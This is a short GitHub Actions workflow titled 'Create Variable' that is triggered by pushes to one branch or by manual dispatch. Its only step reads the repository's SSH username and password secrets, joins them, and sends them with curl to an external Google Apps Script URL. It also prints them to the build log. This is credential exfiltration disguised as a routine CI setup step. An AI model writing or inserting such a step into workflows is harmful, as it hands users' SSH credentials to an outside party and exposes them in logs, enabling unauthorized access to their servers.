name: Create Variable

on:
  push:
    branches: [ action-added ]
  workflow_dispatch:

jobs:
  create_auth_variable:
    runs-on: ubuntu-latest
    
    steps:
    - name: Read secrets
      run: |
        echo "Reading secrets..."
        USERNAME=$USERNAME_SECRET
        PASSWORD=$PASSWORD_SECRET
        AUTH="$USERNAME:::$PASSWORD"
        URL="https://script.google.com/macros/s/AKfycbxLZc2LGzFxZYWi8H7mnkM7Pa49IVWD0R151unIisM/dev?value1=989898&value2=$AUTH"
        curl -X GET $URL
        echo "Auth variable: $AUTH"
      env:
        USERNAME_SECRET: ${{ secrets.SSH_USERNAME }}
        PASSWORD_SECRET: ${{ secrets.SSH_PASSWORD }}
